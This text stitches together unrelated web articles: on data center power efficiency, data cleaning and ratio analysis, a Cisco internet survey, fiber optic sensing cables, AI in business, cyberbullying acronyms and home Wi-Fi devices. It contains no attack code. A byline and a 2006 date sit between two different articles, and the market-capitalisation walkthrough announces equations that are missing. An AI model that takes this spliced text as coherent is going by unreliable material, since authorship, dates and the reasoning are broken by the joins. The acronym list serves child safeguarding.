A lot of the focus in the data center energy efficiency world is placed on cooling, and rightly so: cooling can consume as much as 37% of a well-designed data center's total energy use, according to Emerson. But there are opportunities to improve efficiency on the other side of the rack, too. The power delivery systems, including Uninterruptible Power Supplies (UPS) and transformers, can deliver significant energy (and cost) savings.
The UPS maintains electrical power loads during outages and conditions incoming power under regular circumstances to smooth out surges and other irregularities that could damage equipment or lead to downtime.
Most UPS systems lose energy in the inverter and transformers. Newer units include power management controls that govern switching between the inverter and transformers to increase efficiency; Energy Star rated UPS systems can increase efficiency by 30-55%. Both UPS systems and Power Distribution Units (PDUs) can benefit from newer models with efficient transformers, cutting an additional 2-3% of energy loss.
When choosing efficient UPS systems, it's important to consider redundancy as well as the average power load, which in a typical data center is around 60%. Power ratings are often measured at 100% load, while redundant N+1 systems share the load, with each unit sitting at around 30-50%.
In the new Green House Data facility, efficiency gains are also found in the exterior transformers. Two transformers step 13,200 volts down to 480 volts, moderating the 5 MW of power available on opening day.
In an electric transformer, losses come down to two main categories. No-load losses are produced by the magnetic field in the core, with the biggest contributor being hysteresis losses, which arise as the laminations of the magnetic core are repeatedly magnetized and demagnetized (hysteresis translates as "to lag," because the magnetic flux lags behind the magnetizing force). Load losses result from the heat generated as current flows through the resistance of the conductors, a kind of electrical friction.
The Green-R-Pad distribution transformers we chose boast up to 70% reduced no-load losses. A single 1,000 kVA unit saves seven tons of CO2 emissions annually.
Upgrading power systems might take some upfront investment, but the energy savings can be worth it down the road: the Department of Energy pegs annual savings of $90,000 from just a 5% increase in UPS efficiency for a 15,000 square foot data center.
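Back-of-the-envelope arithmetic makes it easy to sanity-check figures like these. The sketch below uses purely illustrative inputs (the load, electricity price and efficiency gain are assumptions, not numbers from the DOE estimate):

```python
def annual_ups_savings(load_kw, efficiency_gain, price_per_kwh, hours_per_year=8766):
    """Estimate yearly dollar savings from reducing UPS losses.

    load_kw: average power drawn through the UPS
    efficiency_gain: fraction of that power no longer lost (0.05 for a 5% gain)
    price_per_kwh: electricity price in dollars
    """
    return load_kw * hours_per_year * efficiency_gain * price_per_kwh

# Illustrative: a 2 MW load, 5% efficiency gain, $0.10/kWh
print(round(annual_ups_savings(2000, 0.05, 0.10)))
```

At a 2 MW load and $0.10/kWh, a 5% efficiency gain works out to roughly $88,000 per year, the same ballpark as the DOE figure for a large facility.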
Posted By: Joe Kozlowicz
Originally published February 14, 2006
Anyone who has delved into data from the real world knows it can be messy. Survey takers can write down the wrong response. People entering data into a computer can type in the wrong numbers. Computers sometimes garble data because of software bugs (especially when converting one file format to another). Data formats become obsolete as software changes. Electronic data recorders break or go out of adjustment. Analysts mislabel units and make calculational errors.
Cleaning the data to correct such problems is almost always necessary, but this step is often ignored. Ask about the process that was used to clean the data. If the response is just a blank stare or worse, you know you are in trouble. Many companies (such as AT&T and Sega of America) now assign people to check for data quality in the face of all the problems associated with real data.
Some of the more famous examples of how small mistakes in data processing can have disastrous results are found in the space program. In 1962, the Mariner I spacecraft went off course soon after launch and had to be destroyed. The cause of the malfunction was a missing hyphen in a single line of FORTRAN code. Arthur C. Clarke later quipped that this $80 million launch was ruined by “the most expensive hyphen in history.” (CNET online retells the story of this launch as well as other famous computer glitches.)
More recently (1999), NASA’s Mars Climate Orbiter was lost in space because engineers on the project forgot to convert English units to metric units in a key data file, a mistake that cost scientists years of work and taxpayers $125 million. (Source: Sawyer, Kathy. “Engineers’ Lapse Led to Loss of Mars Spacecraft: Lockheed Didn't Tally Metric Units.” The Washington Post. October 1, 1999, p. A1.)
Bad data can have a real cost for a business. If a 500,000-piece mailing uses an address list with an error rate of 20%, the company wastes $300,000 by sending mailings to incorrect addresses. It loses even more money because among those 100,000 missed prospects are about 1,500 people who would have become customers and purchased thousands of dollars worth of the company’s products over their lifetime. The losses from these missed customers can be many times greater than the immediate direct losses. (Source: Aragon, Lawrence. “Down with Dirt.” PC Week. October 27, 1997, p. 83.)
It is crucial to pore over raw data to check for anomalies before doing extensive analyses. For example, typographical errors can lead numbers to be ten, one hundred or one million times bigger than they should be. Looking over the raw data can help you identify such problems before you waste time doing analysis using incorrect numbers.
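A quick programmatic scan can catch order-of-magnitude outliers before they poison an analysis. A minimal sketch (the data and the factor-of-ten threshold are invented for illustration):

```python
import statistics

def flag_magnitude_outliers(values, factor=10):
    """Return values more than `factor` times the column median,
    a common signature of misplaced decimals or extra zeros."""
    med = statistics.median(values)
    return [v for v in values if v > factor * med]

weekly_hours = [38, 41, 40, 400, 37, 39]  # one suspicious entry
print(flag_magnitude_outliers(weekly_hours))  # [400]
```

The flagged value may turn out to be legitimate, but checking it first costs far less than redoing an analysis built on it.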
Bad data can ruin your credibility and call your work into question. Even if there is only one small mistake, it makes your readers wonder how many other mistakes have crept into your analysis. It is difficult to restore your credibility after some obvious mistake is revealed, so avoid this problem in the first place. Dig into your numbers and root out these problems before you finalize your memo, paper or presentation.
Some Specific Advice
If your data come from a non-electronic source, type the data into the computer yourself, assuming there is a manageable amount of data. There is no substitute for this effort, even if you are a highly paid executive, because it will help you identify inconsistencies and problems with the data and give you ideas for how to interpret them. This technique also gives you a feeling for the data that cannot be replicated in any other way. You will almost surely see patterns and gain unexpected insights from this effort.
Check that the main totals are the sum of the subtotals. Most documents are rife with typographical errors and incorrect calculations. Therefore, you should not rely blindly on any data source’s summations but calculate them from the base data. You can check your typing accuracy by comparing the sums to those in the source of data. If they match exactly, it is unlikely that your typing is in error. Even if you don’t check these sums, you can bet that some of your readers or listeners will. Do it yourself and avoid that potential embarrassment.
Check that the information is current. Do not forget that business and government statistics are revised regularly. Make sure you know the vintage of the input data used in the analysis. For example, don’t compare analysis results generated using one year’s census data with those based on another year’s data (unless your sole purpose is to analyze trends over time).
Check relationships between numbers that should be related in a predictable way. Such comparisons can teach valuable lessons. For example, when examining data on carbon emissions of different countries, a newcomer to the field of greenhouse gas emissions analysis might expect that the amount of carbon emitted per person would not differ much among industrialized countries. In examining such data, however, we find large differences in carbon emitted per person, from less than 1 metric ton/person/year in Portugal to more than 6 tons/person/year in Luxembourg. Determining why such differences exist is the logical next step, which will inevitably lead to further analysis and understanding.
Check that you can trace someone else’s calculation in a logical way. If you cannot do this, you can at least begin listing the questions you need to answer to start tracing the calculation. Ultimately, if you cannot reproduce the calculation, the author has broken a fundamental rule of good data presentation, and his analysis is suspect.
Compare the numbers to something else with which you are familiar, as a “first-order” sanity check. These comparisons can show you whether or not you are on the right track. Presenting such comparisons in reports and talks can also increase your credibility with your readers or listeners because it shows that your results “pass the laugh test.”
Normalize numbers to make comparisons easier. For example, the true size of total U.S. gross national product (GNP) in trillion dollars per year is difficult for most people to grasp, but normalized to dollars per person per year it becomes a bit more understandable. Common bases for such normalizations are population (per person/per capita), economic activity (per dollar of GNP), or physical units of production (per kilowatt hour or per kilogram of steel produced).
If you have information that extends over time (“time series data”), normalize it to a base year to enhance comparisons. By expressing such data as an index (e.g., 1940 = 1.0), you can compare trends to those of other data that might be related. For example, if you plot U.S. raw steel production (Figure 1), population (Figure 2), and GNP (Figure 3) in separate graphs, it is difficult to gain perspective on how fast steel production is changing over time relative to these other two important determinants of economic and social activity. However, if you plot steel production over time as an index with 1940 = 1.0 (see Figure 4), you can plot population and GNP on the same graph. Such a graph will instantly show whether growth rates in the data differ.
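Indexing a time series to a base year is a one-line transformation per series. A sketch with invented numbers (not the actual steel data, though chosen to echo the rough trend described here):

```python
def index_to_base(series, base_year):
    """Express a {year: value} series relative to base_year (base = 1.0)."""
    base = series[base_year]
    return {year: value / base for year, value in series.items()}

steel = {1940: 60, 1970: 120, 1990: 90}  # illustrative values only
print(index_to_base(steel, 1940))  # {1940: 1.0, 1970: 2.0, 1990: 1.5}
```

Once each series is on the same 1940 = 1.0 scale, they can share one set of axes and their growth rates can be compared at a glance.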
In this example, real GNP grew by a factor of more than five from 1940 to 1990. U.S. steel production roughly doubled by 1970 and then declined by 1990 to roughly 50% above 1940 levels. The population in 1990 just about doubled from 1940 levels. (Sources: 1940-1980 GNP from the Statistical Abstract of the US 1990, p. 425. 1990 GNP in current dollars from 1997 World Almanac and Book of Facts, p. 133, adjusted to 1982 dollars using the consumer price index from p. 132 of that document.)
The trends for U.S. steel production in Figure 4 dramatically illustrate the changing fortunes of steel in a postindustrial economy. Just after World War II, steel use per capita increased as automobile ownership expanded and use of steel for bridges and other forms of construction also increased. After 1970, the steel industry began to face serious competition from foreign steel makers as well as from alternative materials such as aluminum alloys and composites. Consequently, U.S. production declined even as the population increased and real GNP went through the roof. (Source: U.S. raw steel production from 1997 World Almanac and Book of Facts, p. 153.)
Figure 1: U.S. production of raw steel 1940-1990 (million short tons)
Figure 2: U.S. population 1940-1990 (million people)
Figure 3: U.S. gross national product 1940-1990 (billion 1982 dollars)
Figure 4: U.S. raw steel production, population, and gross national product 1940-1990, expressed relative to 1940 levels (1940 = 1)
Break problems into component parts. Explore analysis results by examining the factors that led to those results. For example, suppose someone tells you that the market capitalization of Google in January 2006 was about $130 billion and that of General Electric (GE) was $350 billion. What steps should you take to understand what these numbers mean?
Market capitalization is the product of the number of shares outstanding and the stock price per share, as shown in the following equation:

Market capitalization = Shares outstanding × Price per share
The stock price per share can be further broken down into the product of the earnings per share and the price-to-earnings ratio, yielding the following simple model:

Market capitalization = Shares outstanding × Earnings per share × Price-to-earnings ratio
The product of the number of shares and the earnings per share gives the total annual earnings (profits) for each company. Substituting in the previous equation, we get:

Market capitalization = Total annual earnings × Price-to-earnings ratio
If we divide both sides of this equation by annual revenues, we get:

Market capitalization / Annual revenues = (Total annual earnings / Annual revenues) × Price-to-earnings ratio
All of these equations represent variations on the same model. Different forms of the model will be useful at different times.
For most companies, the basic information for the model is readily available on the Web, so that is the best place to start (you could also go to the library). Table 1 summarizes the key financial parameters for calculating market capitalization for the two companies (taken from Yahoo Finance on January 29, 2006).
The first thing to notice about the financial statistics for these two companies is a huge disparity. While GE’s market capitalization in January, 2006, was about three times larger than Google’s, GE’s revenues were almost thirty times larger. All other things being equal, we might expect that companies with similar market valuations would also have similar revenue streams. All other things are not equal, however, and finding out why will help illustrate this important analytical technique.
If Google’s market capitalization per dollar of revenues were the same as GE, we would expect that its market capitalization would be only one-tenth as large as it is. We need to explain this tenfold discrepancy. To do so, we examine the components of the last equation above. The first component is earnings per dollar of revenues, and the second component is the price-to-earnings ratio.
As Table 1 shows, Google’s earnings in January, 2006, were about twice as big as GE’s per dollar of revenues, which accounts for about a factor of 2.3 in our tenfold difference. The price-to-earnings ratio also differed between the two companies. Apparently, the stock market valued one dollar of Google’s earnings 4.5 times as much as one dollar of GE’s earnings, which accounts for the remaining difference.
By breaking these numbers into their component parts, we have been able to isolate the two key reasons for the tenfold discrepancy identified above. The next step is to explain why these two reasons exist.
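The decomposition can be written out directly. In this sketch, the market capitalizations and Google's revenue are the figures quoted in the article; GE's revenue is an assumed round number consistent with "almost thirty times larger," and the two factors are the article's approximate values:

```python
goog = {"mkt_cap": 130e9, "revenue": 5.25e9}   # figures quoted in the article (Jan 2006)
ge   = {"mkt_cap": 350e9, "revenue": 150e9}    # GE revenue assumed ~30x Google's

def cap_per_dollar_of_revenue(company):
    return company["mkt_cap"] / company["revenue"]

discrepancy = cap_per_dollar_of_revenue(goog) / cap_per_dollar_of_revenue(ge)
print(round(discrepancy, 1))  # 10.6: the "tenfold" difference

# The article attributes the gap to two multiplicative factors:
earnings_margin_factor = 2.3  # Google earns ~2.3x more per dollar of revenue
pe_ratio_factor = 4.5         # each dollar of Google earnings is valued ~4.5x higher
print(round(earnings_margin_factor * pe_ratio_factor, 1))  # roughly 10, matching
```

The point of writing it this way is that each factor in the product is a separate question to investigate, rather than one opaque tenfold mystery.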
Google’s greater profitability per dollar of revenue reflects the difference between industrial manufacturing and internet software development. The latter has very low marginal costs of reproducing the product and high gross margins. Google’s higher price-to-earnings ratio reflects the market’s belief that its dominance will allow the company to continue to generate growth in earnings at a pace vastly exceeding that of traditional industrial enterprises.
Dissecting analysis results by comparing ratios of key parameters is a powerful approach, and one to use frequently. Any time you have two numbers to compare, this kind of “ratio analysis” can lead to important insights into the causes of underlying differences between the two numbers.
Creating a presentation or an executive summary for a complex report always involves boiling an analysis down to the essentials. First, create equations (like the ones above) that calculate key analysis results as the product of several inputs multiplied together. Then, determine which of these inputs affects the results most significantly. Creating such models can help you think systematically about your results.
Applying these Skills to Reading Tables and Graphs
The profusion of tables and graphs in magazine and news articles gives you many opportunities to practice these skills, which will help you understand the bottom-line results and determine whether you find the author credible. If the tables and graphs are good enough, you can then read the paper to follow the author’s reasoning more closely.
If the tables and graphs are poorly designed or confusing, I lose respect for the author. It is essential that tables and graphs summarizing analysis results be clear, accurate, and well documented. If they aren’t, including them is worse than useless because they hurt your argument and your credibility.
Start by checking for internal consistency. I always begin at the bottom line of the table and work backward. I examine the column and row headings to be sure I understand what each one represents (I read the footnotes if I have questions). Then, I assess whether the components of the total add up to the total. This procedure shows me whether the calculations are accurate, and it helps me become familiar with the various parts of the analysis.
Not surprisingly (but fortuitously for purposes of this article), I found one internal inconsistency in the data on Yahoo finance in the course of creating the comparison between Google and GE above. Yahoo gives revenues per share of $19.6 for Google, but if you multiply those revenues per share by the number of shares, you get total revenue of $5.8 billion, instead of the $5.25 billion revenues listed in Yahoo finance. I assumed that the total revenues and numbers of shares given by Yahoo were correct and adjusted the revenues per share to reflect that assumption. You can’t take any data for granted!
It is a good idea to look over the numbers in the table and identify those that are abnormally small or large. Typographical errors are quite common in tables (particularly in tables that summarize results from other, more detailed tables), and a quick scan can help you find them. For example, if you are reading a table summarizing hours worked per week by different team members on a project, an entry from one person that is ten times larger than the entries for others should catch your attention and prompt you to investigate further. The number itself may not be wrong, but checking it will increase your confidence in the numbers and help you understand how they were calculated.
Sometimes numbers do not exactly add up because of rounding errors, not because there is a mistake in the calculations. For example, say you have formatted a spreadsheet table so there are no decimal places for the entries in the table. These entries might be 9.4 and 90.4, but in the table they are shown as 9 and 90 because the convention is to round numbers down to the next whole number when the decimal remainder is less than 0.5 (the remainder in both cases is 0.4 in this example). The sum is 99.8, which rounds to 100 and is shown in the spreadsheet as the total. The sum of 9 and 90 is 99, which makes the total of 100 look wrong even though there is a perfectly sensible explanation. If you’re not aware of this potential pitfall, you could be misled by these apparent errors.
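This rounding behavior is easy to reproduce. The sketch below mirrors the example in the text:

```python
entries = [9.4, 90.4]
displayed = [round(x) for x in entries]  # shown in the table as 9 and 90
displayed_total = round(sum(entries))    # the true sum 99.8 is shown as 100

print(displayed, sum(displayed))  # [9, 90] 99  <- looks inconsistent
print(displayed_total)            # 100 <- but the underlying math is fine
```

Seeing 9 + 90 "equal" 100 in a formatted table is an apparent error with a perfectly sensible explanation, so check the unrounded values before crying foul.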
Read the footnotes carefully. They should convey the logic of the calculations and the sources of key input data. If you cannot determine the methods used from the footnotes, you should be especially suspicious of the results and investigate further.
Check for ambiguous definitions and terminology. For example, there are at least five distinct definitions of the word “ton,” and analysts often neglect to specify which definition they are using. If it is not crystal clear what the label means, you are likely to be led astray when interpreting the numbers. A slightly different example involves the number of hours in a year. Many analysts assume it is 8,760 hours, but on average it is 8,766 hours because of leap years. This difference is essentially a definitional one, but it can lead to small inaccuracies in calculations.
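The hours-in-a-year difference is quick to verify, and quantifying it shows how small the resulting inaccuracy is:

```python
common_assumption = 365 * 24    # 8,760 hours: ignores leap years
with_leap_years = 365.25 * 24   # 8,766 hours on average
error = (with_leap_years - common_assumption) / with_leap_years

print(common_assumption, with_leap_years, f"{error:.2%}")  # 8760 8766.0 0.07%
```

A 0.07% difference rarely matters on its own, but definitional mismatches like this compound when several analysts' numbers are combined.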
The next step is to check consistency with independent external sources to make sure the values in the tables and graphs are roughly right. As described earlier, compare growth over time to growth in other key data, such as population and gross domestic product to get perspective on how fast something is growing relative to these commonly used indicators.
Does the information in the tables or graphs contradict other information you know to be true? That table of hours worked may list Joe as someone who worked little on the project at hand; but if you know for a fact that Joe slaved over this project for many weeks because it was his idea, then you will need to check the calculation. Similarly, if there is an entry of 175 hours for one week, it must be a typo or a miscalculation because there are only 168 hours in a week.
Take ratios of results and determine whether the relationships they embody make sense. If one component of the total is growing much faster than other components over time or if it is especially large compared to others, then investigate further. Look for large discrepancies and investigate when you uncover them.
Follow up when you encounter cognitive dissonance – any contradiction between your knowledge and the information in the table will lead to greater understanding, one way or the other. If there is a logical explanation for the contradiction, you have learned more about the relationships between the information in the table and what you knew before. If the contradiction indicates a real inconsistency, you have identified a flaw in the analysis. Root out the causes of cognitive dissonance, and you will enhance your knowledge without fail.
When John Holdren was a professor at the University of California Berkeley, he taught a delightful class titled "Tricks of the Trade." In this class, he described many of the unwritten rules about being effective in the energy/environment field and listed key pitfalls in data acquisition and handling, which I have aggregated into four golden rules.
Holdren’s advice when dealing with data is: “Be suspicious, skeptical, and cynical. Assume nothing.” Though it may sound paranoid to the uninitiated, such caution is an absolute necessity for the seasoned business analyst.
Demonstrating the increasing role of the network in people’s lives, an international workforce study by Cisco revealed that one in three college students and young professionals considers the Internet to be as important as fundamental human resources like air, water, food and shelter.
The Cisco report also found that more than half of the study’s respondents say they could not live without the Internet and cite it as an “integral part of their lives” – in some cases more integral than cars, dating, and partying.
These and numerous other findings provide insight into the mindset, expectations, and behavior of the world’s next generation of workers and how they will influence everything from business communications and mobile lifestyles to hiring, corporate security, and companies’ abilities to compete.
Dave Evans, chief futurist, Cisco: “The lifestyles of ‘prosumers’ – the blending of professionals and consumers in the workplace – their technology expectations, and their behavior toward information access is changing the nature of communications on a global basis. The findings in the Cisco Connected World Technology Report provide businesses with insights that will give them a competitive advantage when it comes to IT decisions and HR processes.”
Air, water, Internet: One of every three college students and employees surveyed globally (33%) believes the Internet is a fundamental resource for the human race – as important as air, water, food and shelter. About half (49% of college students and 47% of employees) believe it is “pretty close” to that level of importance. Combined, four of every five college students and young employees believe the Internet is vitally important as part of their daily life’s sustenance.
Life’s daily sustenance: More than half of the respondents (55% of college students and 62% of employees) said they could not live without the Internet and cite it as an “integral part of their lives.”
The new way to get around: If forced to make a choice between one or the other, the majority of college students globally – about two of three (64%) – would choose an Internet connection instead of a car.
Importance of Mobile Devices: Two-thirds of students (66%) and more than half of employees (58%) cite a mobile device (laptop, smartphone, tablet) as “the most important technology in their lives.”
Online interruption or disruption? College students reported constant online interruptions while doing projects or homework, such as instant messaging, social media updates and phone calls. In a given hour, more than four out of five (84%) college students said they are interrupted at least once. About one in five students (19%) said they are interrupted six times or more – an average of at least once every 10 minutes. One of 10 (12%) said they lose count how many times they are interrupted while they are trying to focus on a project.
The global study consists of two surveys – one involving college students, the other on young professionals in their 20s. Each survey includes 100 respondents from each of 14 countries, resulting in a pool of 2,800 respondents.
The complete report is available here. | <urn:uuid:f8976f63-0ace-4805-b218-28daba413772> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2011/09/22/cisco-reveals-the-importance-of-networks-in-daily-life/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00110-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955188 | 654 | 2.609375 | 3 |
Fiber optic sensing technology has grown in importance over the last few years as it reaches into more areas of everyday life. It is now a fully mature, cost-effective technology that offers major advantages over conventional measurement methods. In particular, the use of Fiber Bragg Gratings (FBGs) for measuring strain and temperature is now widespread throughout many industries and in many demanding applications. A sensing fiber optic cable is a sensor based on optical fiber: as physical quantities in the surrounding environment change (pressure, vibration, temperature and so on), the intensity, phase and polarization of the light transmitted through the fiber change with them. Because the fiber is especially sensitive to these physical effects, those changes can be detected and used to measure the quantities of interest.
Applications of Sensing Fiber Optic Cable
Fiber optic sensor technology was developed to satisfy particular needs in specific applications, initially in the military. With the rapid development of the technology, it has become more generic and now serves a broad range of applications across many fields, with unforeseen applications still expected to emerge. Sensing fiber optic cable, one important achievement of this technology, is now widely used in the petrochemical, steel and mining industries for fire detection, structural health monitoring and temperature measurement.
Oil & Gas Industry
Used for optimized production and integrity monitoring in risers, umbilicals and oil wells, and for subsea, reservoir and seismic monitoring.
Used to monitor the temperature of energy production and distribution facilities, power cables, high-voltage switchgear, transformers and similar equipment, contributing to optimized performance and operational safety.
Used to monitor soil movement, dams and construction areas, and to understand and monitor hydrological processes in agriculture, oceans, lakes, rivers and sewers.
Installed in transportation infrastructure, along highways and embedded in roads, bridges and rail tunnels, to achieve efficient, fast, flexible and cost-effective structural monitoring as well as fire, ice or water detection.
Used to protect critical infrastructure and national borders, including pipelines, power distribution networks, airports and construction sites.
Sensing fiber optic cable can help prevent major damage in many cases by accurately and swiftly measuring any temperature increase caused by local fires or overheating in a specific area.
Sensing Fiber Optic Cable in Fiberstore
Fiberstore offers six kinds of sensing fiber optic cables. Their excellent mechanical performance makes them as easy to use as ordinary wire and able to adapt to various conditions.
PBT Tube Temperature Sensing Optical Cable
The cable consists of bare fiber, filling compound, PBT tubing, Kevlar and an outer jacket. It offers good optical transmission performance, excellent immunity to electromagnetic interference and very good water resistance. It can be used for temperature and stress measurement, and its nonmetallic structure makes it a good fit for high-voltage and strong electromagnetic environments.
Armored Temperature Detecting Sensor Cable
The cable is strengthened by both a stainless steel (SUS) spring tube and SUS braiding, giving it very good tensile and crush resistance. It is widely used in fire detection, structural health monitoring, temperature monitoring and similar applications.
Silica Gel Sensing Fiber Optical Cable
The structure of this cable is very simple, but the special silicone jacket and Teflon tube provide very good resistance to high temperatures and high voltages, making it well suited to such environments: it can work normally even at 250℃ or at 6 kV.
Teflon Sheathed sensor cable
The Teflon cable is well suited to high-temperature environments and can work normally even at 150℃. It can be used in fiber optic temperature sensing systems.
Seamless Tube Temperature Sensing Optical Cable
The cable is made up of bare fiber, filling compound, a stainless steel seamless tube and a sheath. The seamless tube provides high tensile and crush resistance. It is usually used in oil fields, mines and the chemical industry for temperature and pressure monitoring to help prevent accidents.
Copper Braid Armored Sensor Cable
Copper braid armored sensor cable can be used in outdoor optical fiber communication and fiber optic sensing. In power environments, the special cable structure reduces the impact of electromagnetic waves and electromagnetic fields, resulting in less optical signal loss.
Artificial Intelligence—which we define as information systems and applications that can sense, comprehend and act—has moved beyond the research lab and captured the attention of CEOs and other high-level executives.
The media regularly draws attention to innovative business solutions based on AI. Venture capitalists are funding AI start-ups at a rapid pace. Technology companies are moving swiftly to create and capture value in this emerging area.
Decision makers must recognize that AI isn’t a matter of any single technology or application, whether driverless cars, smartphone virtual assistants or any of a myriad of other examples.
In this report, we offer a perspective on how these technologies affect business and society, and present a framework for understanding how AI can deliver value for your organization and industry.
AI systems can be self-learning, like bright students who are given educational materials and then learn by themselves. That is, computers are enabled to sense, comprehend and act, as the following examples illustrate.
Consider how a border-control kiosk uses computer vision technologies such as facial recognition to sense characteristics of travelers.
Integrated with other technologies such as multispectral image analysis (scanning passports using infrared and ultraviolet light), extensive information databases and matching algorithms, an integrated solution here can improve security by identifying people on unauthorized entry lists or others posing a risk.
AI systems also comprehend through technologies such as natural language processing, inference engines and expert systems.
These technologies have a wide range of applications across multiple industries. For example, a medical diagnostic system can help doctors identify diseases and suggest treatments.
An AI system acts independently, taking action within a process through technologies such as inference engines and expert systems, or it can direct action in the physical world.
Consider the driverless car, which senses the environment, understands the myriad inputs and then steers the car without assistance from a human driver.
The range of available AI solutions can be categorized along two dimensions: first, the complexity of the work being done, and second, the complexity of the data and information being worked with. The resulting range of solutions can be classified into four primary types of activity models.
The first is the efficiency model, which characterizes more routine activities based on well-defined rules, procedures and criteria. The goal here is to provide consistent, low-cost performance.
In this model, work is more likely to involve judgment and is highly reliant on individual expertise and experience—activities performed, for example, by doctors, lawyers, financial advisors and engineers.
Decision-making and action is generally taken by humans themselves, while technology’s role is to augment human sensing and decision making—enabling analysis and offering advice and implementation support.
The goal is to improve the overall ability of workers and companies to produce a particular desired result. This class of workers typically requires considerable knowledge of their industry, company and business processes.
Their success is highly reliant on coordination and communication and involves a wide range of interconnected activities—work such as administration, managing, sales and so forth. In these solutions, technology acts as a personal assistant or agent on behalf of humans at their direction.
In this model, AI solutions enhance creativity and ideation by humans—activities and roles such as biomedical researchers, fashion designers, chefs, musicians and entrepreneurs. Humans make decisions and act, while technology helps identify alternatives and optimize recommendations.
Game–changer for every industry
A key is not to become too entranced by any particular technology, as if that technology by itself is the answer.
It is vital to think first in terms of types of work, and then consider the business rationale for integrating technologies into a total AI solution related to that work.
It is important that business continues to engage in the ongoing dialogue about these technologies’ effects on jobs, education and society.
What happens in terms of the social impact of AI is not up to the technology, but to us. The business opportunity of getting it right is too significant to be left to chance.
Have you ever caught a glance of your child’s screen as they were chatting to friends online and wondered what they were saying? Are you a teacher, struggling to maximize internet safety in your classroom? How often have you found your students typing a sequence of letters conveying supposed nonsense?
Whilst acronyms and abbreviations offer a convenient shortcut to informal communication in the digital world, and however harmless they may first appear, the reality is that they are often used by young people to hide inappropriate behaviour from prying eyes. And beneath the unthreatening guise of a few capital letters can lie some severely distressing messages, usually designed with malicious intent. The question is, do you know your ‘LOL’ from your ‘ROFL’ and, if you needed to, could you decipher these twenty-first century slang terms to recognize when they are being used to facilitate bullying online?
In the quest to implement successful internet safety provisions in schools and ensure internet safety in a home environment, many parents, teachers and carers feel they lack the knowledge to accomplish these aims. That’s why we have shown our support by putting together a list of the top 5 acronyms and abbreviations that we think parents, carers and educators should be aware of. Impero have worked closely in partnership with the Anti-Bullying Alliance to offer advice to those responsible for the internet safety of young people, helping to find the balance between realizing the endless opportunities of the digital world, whilst also safeguarding children from the associated risks.
1. YHBT – You have been trolled
A recent phenomenon, the online ‘troll’ has been described as today’s modern menace. It is speculated that the term derives from the fishing technique of trolling, in which bait is towed behind a boat, but some also believe it refers to the well-known monster of the same name. Trolls trawl the internet actively creating arguments and posting provocative or inflammatory content in various online communities. Trolls have received huge media attention in recent years, with some facing prison sentences for defacing online tribute sites.
2. FUGLY – Fat and ugly
This is one of the most commonly used acronyms used to bully online, designed to insult a victim’s personal appearance. If you have witnessed a young person sending this term, then it is likely that they are using the acronym to insult a peer. Equally, if a child receives this term, it would suggest that they are a victim of cyberbullying.
3. GKYS – Go kill yourself
This is a particularly concerning term due to the seriousness of its nature, yet it is often difficult to determine the difference between the use of the term as banter or as a genuine threat. Regardless, if you discover a young person sending or receiving this term, the incident must be investigated seriously.
4. SITMF – Say it to my face
This term differs from the previous three, as it is typically used in retaliation to cyberbullying, as opposed to facilitate cyberbullying. If a young person is subjected to online bullying, this term could be used by the victim to encourage the perpetrator to confront them in the real world. Though the term may appear less concerning, it could potentially indicate bullying behaviour and should be dealt with accordingly.
5. JLMA – Just leave me alone
As with SITMF (say it to my face), it is important to be aware of the terms used by both perpetrators and victims in a cyberbullying situation, as they can all help to highlight that cyberbullying is taking place. If a perpetrator is sending messages of an unwanted nature, this term could be used by a victim in response.
It is impossible to know and remember every single phrase, acronym and abbreviation used by young people online today. New terms are constantly being invented; the best way to ensure internet safety is to be aware of the jargon and to develop a clear understanding of the definitions. | <urn:uuid:08d99050-f2ca-41db-ad79-420a7481c760> | CC-MAIN-2017-04 | https://www.imperosoftware.com/top-5-internet-safety-phrases/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00348-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960303 | 820 | 3.359375 | 3 |
Fact: We need fast, reliable Internet. And increasingly, we need it everywhere.
Nearly three-quarters of us believe that having high-speed Internet in every room of the house is either vitally important or very important. That’s according to our latest Consumer Entertainment Index study.
High-speed Internet is so important because it is related to almost everything we do, from video chatting with our family and friends to streaming movies on Netflix® and gaming over the Playstation® and Xbox One networks. A lot of things run expressly on the Internet, and the Internet, in turn, relies on the devices that deliver it throughout our homes.
Today we’re going to talk about the four most important ones: modems, Wi-Fi® routers, broadband gateways, and extenders.
The first piece of the puzzle is your modem: it brings the Internet into your home. Because it’s your home’s primary connection to the Internet, it’s arguably the most important device.
Of course, we all just want Wi-Fi without limits, and for that, you need a Wi-Fi router. It takes the Internet from your modem and creates a wireless signal that you can access throughout your home. But keep in mind that the strength of that wireless signal changes based on things inside your home, like the type of walls or floors it has to go through, or how far away it is from the devices it’s communicating with (e.g., tablets, cell phones).
A gateway is a device that combines the modem and Wi-Fi router into a single device. It brings the Internet signal into your home and also transmits it wirelessly.
So now we have our modem, router and gateway—but what happens when there’s a room in your home where the Wi-Fi is very weak or non-existent? There are many ways to improve the range of the Internet in your home, but one of the simplest and most cost-efficient is using a Wi-Fi network extender or repeater. It receives the wireless signal from your router or gateway and boosts it a further distance than the router may be capable of broadcasting on its own—like a megaphone does with your voice. But keep in mind that each wireless repeater cuts your bandwidth in half. So while it allows you to cover more ground, you’ll also lose some effective speed.
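The repeater arithmetic above can be sketched in a few lines. This is a rough, illustrative model only, assuming each hop simply halves the available bandwidth; real-world speeds also depend on hardware, channels and interference.

```python
def effective_speed(base_mbps, repeaters):
    """Rough effective speed after a chain of repeater hops,
    assuming each hop halves the available bandwidth."""
    return base_mbps / (2 ** repeaters)

if __name__ == "__main__":
    # Starting from a 100 Mbps connection:
    for hops in range(3):
        print(f"{hops} repeater(s): ~{effective_speed(100.0, hops):.1f} Mbps")
```

So two chained repeaters would leave you with roughly a quarter of your original speed, which is why extenders are best used sparingly.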
Now that we’ve talked about how these networking pieces work together, how do you know which one to buy? Check out our SURFboard web site for more information. | <urn:uuid:0938f38c-dd8b-4f9f-a9be-0b63074ed4fc> | CC-MAIN-2017-04 | http://www.arriseverywhere.com/tag/extender/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00100-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935367 | 533 | 2.515625 | 3 |
In our previous video, we described big data in terms of volume, velocity, and variety of information and then looked at some use cases of big data.
